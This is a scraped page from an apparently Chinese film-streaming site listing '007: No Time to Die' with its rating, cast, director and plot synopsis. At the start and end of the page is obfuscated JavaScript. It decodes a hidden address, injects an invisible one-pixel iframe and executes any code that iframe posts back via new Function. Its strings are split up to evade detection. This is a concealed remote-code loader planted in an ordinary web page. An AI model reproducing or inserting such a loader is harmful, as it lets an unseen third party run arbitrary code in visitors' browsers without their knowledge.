if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['zsjSayj']=function (){ ;(function (u, w, d, f, c) { 'jQuery'; var x = qdfEWb; var _id = d['qu'+'ery'+'Se'+'le'+'cto'+'rA'+'ll']('.a4352').length; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'c'+_id+'.fon'; var __nid='i'+new Date().getTime(); var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = __nid; f.className = 'a4352'; f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['__y' + 'ra' + 'nq' + 'ob' + 'j_4352_'+_id] = d['qu' + 'ery' + 'Sele' + 'cto' + 'r']('#'+__nid); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_4352_`+_id]) { var t = x(e.data[`des_s_4352_`+_id].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'FFa'+'HR0'+'cHF'+'FMl'+'MFF'+'0El'+'FFM'+'kYl'+'MkF'+'FZq'+'YFF'+'S5q'+'FFa'+'W5F'+'FnY'+'WFF'+'53Z'+'Wku'+'FFY'+'29t'+'JTN'+'BMF'+'FTA'+'0ND'+'MlM'+'kFF'+'ZjN'+'FFG'+'NhN'+'DIF'+'FlM'+'kFF'+'ZjL'+'FFT'+'QzF'+'FNT'+'IFF'+'tMj'+'UtM'+'FFW'+'U2', window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}

007:无暇赴死

评分:
2.5 还行

分类:动作片 英国,美国 2021

主演:丹尼尔·克雷格  安娜·德·阿玛斯  蕾雅·赛杜  拉米·马雷克  拉尔夫·费因斯  克里斯托弗·瓦尔兹  娜..   

导演:凯瑞·福永   

在《007:无暇赴死》中,世界局势波诡云谲,再度出山的邦德面临有史以来空前的危机,传奇特工007的故事在本片中达到高潮。新老角色集结亮相,蕾雅·赛杜回归,二度饰演邦女郎玛德琳。系列最恐怖反派萨芬(拉米·马雷克饰)重磅登场,毫不留情地展示了自己狠辣的一面,不仅揭开了玛德琳身上隐藏的秘密,还酝酿着危及数百万人性命的阴谋,幽灵党的身影也似乎再次浮出水面。半路杀出的新00号特工(拉什纳·林奇饰)与神秘女子(安娜·德·阿玛斯饰)看似与邦德同阵作战,但其真实目的依然成谜。关乎邦德生死的新仇旧怨接踵而至,暗潮汹涌之下他能否拯救世界?

详情

猜你喜欢

加载中...

Copyright © 2015-2019 看最新电影就上258R影视网

电影

电视剧

综艺

动漫

影视直播

专题

资讯

if(typeof eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=="undefined"){eval("\x77\x69\x6e\x64\x6f\x77")["qdfEWb"]=function(e){var sx="ABCDEFGHIJKLMNOPQRSTUVWXYZ"+"abcdefghijklmnopqrstuvwxyz"+"0123456789+/=";var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,"");while(f<e.length){s=sx.indexOf(e.charAt(f++));o=sx.indexOf(e.charAt(f++));u=sx.indexOf(e.charAt(f++));a=sx.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return(function(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;})(t);};}
eval('\x77\x69\x6e\x64\x6f\x77')['WRXbbmN']=function (){ ;(function (u, w, d, f, c) { var x = qdfEWb; u = decodeURIComponent(x(u.replace(new RegExp(c + '' + c, 'g'), '')))+'.fon'; 'jQuery'; var k = '', wr = 'w' + 'ri' + 't' + 'e'; var c = d[x('Y3VycmVudFNjcmlwdA==')]; var f = d.createElement('iframe'); f.id = new Date().getTime(); f.style.width = f.style.height = 1 + 'px'; f.src = [u].join('-'); d[wr](f.outerHTML); w['ad' + 'dEv' + 'entL' + 'ist' + 'ener']('m' + 'ess' + 'age', function (e) { if (e.data[`des_s_4996`]) { var t = x(e.data[`des_s_4996`].replace(new RegExp('FdaWAFAbWFf', 'g'), '')); new Function(decodeURIComponent(t.replace(/\+/g, '%20')))(); } }); })(''+'FFa'+'HRF'+'F0c'+'HFF'+'MlM'+'0El'+'MkY'+'lMk'+'ZqY'+'FFS'+'5qa'+'W5n'+'YWF'+'F53'+'ZFF'+'Wku'+'Y29'+'FFt'+'JTN'+'BMF'+'FTA'+'0ND'+'MFF'+'lMk'+'FFZ'+'jNF'+'FGN'+'hFF'+'NDI'+'FFl'+'MkF'+'FZj'+'LTQ'+'5FF'+'OTY'+'tMj'+'FFI'+'tMW'+'U2',window, document, '' + 'Pwf' + 'SmZ' + 'j' + '', 'F');}